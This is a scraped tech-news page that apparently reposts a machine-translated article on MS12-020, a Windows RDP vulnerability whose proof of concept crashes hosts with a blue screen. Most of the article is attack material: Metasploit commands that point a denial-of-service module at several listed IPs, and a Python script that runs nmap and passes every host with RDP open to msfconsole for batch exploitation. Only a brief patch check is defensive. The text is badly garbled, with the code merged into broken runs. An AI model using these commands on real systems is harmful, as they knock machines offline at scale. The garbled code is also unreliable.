In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Vulnerability describes Windows remote Desktop Protocol vulnerability, executable code, POC can lead to blue screen. (RDP remote Desktop execution Code vulnerability) affects the target Windows XP sp3Windows xp sp2Windows Vista sp2Windows 7Windows Server 2003Windows Server 2008Windows Server 2008 R2msfpayload to exploit msfconsoleuse auxiliary/dos/windows/rdp/ms12_020_maxchannelidsset rhost run
This pyload only supports a single target.
Quickly launch msfconsole-x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10 leading runningset rhost 10.129.10.37" exiting runningset rhost 10.129.10.169 "exiting runningset rhost 10.129.10.209" transparently runningset rhost 10.129.10.232 "batch generate test script (nmap-port2ip.py) # encoding:utf-8import xml.saximport sysimport osclass MovieHandler (xml.sax.ContentHandler) through bash script: def _ _ init__ (self, filterport=None): self.CurrentData ="self.port=filterport self.data ="self.datas= [] # element starts event processing def startElement (self, tag Attributes): self.CurrentData = tag if tag = = "address": self.data=attributes ["addr"] # element end event handling def endElement (self, tag): if self.CurrentData = = "address": self.datas.append (self.data) self.data= "self.CurrentData ="class Gather (object): def _ _ init__ (self) Filterport=None): # create a XMLReader self.parser = xml.sax.make_parser () # turn off namepsaces self.parser.setFeature (xml.sax.handler.feature_namespaces, 0) # rewrite ContextHandler self.Handler = MovieHandler (filterport) self.parser.setContentHandler (self.Handler) def run (self Port): self.Handler.datas= [] self.parser.parse (port+ ".xml") print (self.Handler.datas) def get_ans (self): return self.Handler.datasif _ _ name__ = = "_ main__": if len (sys.argv)! = 3: os.exit () os.system ("nmap" + sys.argv [1] + "- p" + sys .argv [2] + "--open-oX" + sys.argv [2] + ".xml") g = Gather () g.run (sys.argv [2]) # create cmd cmd ='"use auxiliary/scanner/rdp/ms12_020_check Set threads 20 'ips = g.get_ans () if len (ips) > 0: for ip in g.get_ans (): cmd + = "set rhosts" + ip+ "; run;" cmd + =' exit " "'os.system (" msfconsole-x "+ cmd) # uses the method python nmap-port2ip.py # function: all hosts in the specified IP segment are detected for vulnerabilities in a service, the host IP that may have problems is obtained, and the corresponding Msf Payload is called to attempt exploitation. # ip can support a single IP, CIDR IP, 10.129.1.1-154,etc. The format is the same as nmap. # port only supports single port vulnerability patch detection systeminfo | find / I "KB2621440". If the result is as follows, it is proved to have been patched, otherwise, the corresponding patch is required.
Patch Windows Server 2003
Reference article Microsoft MS12-020
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.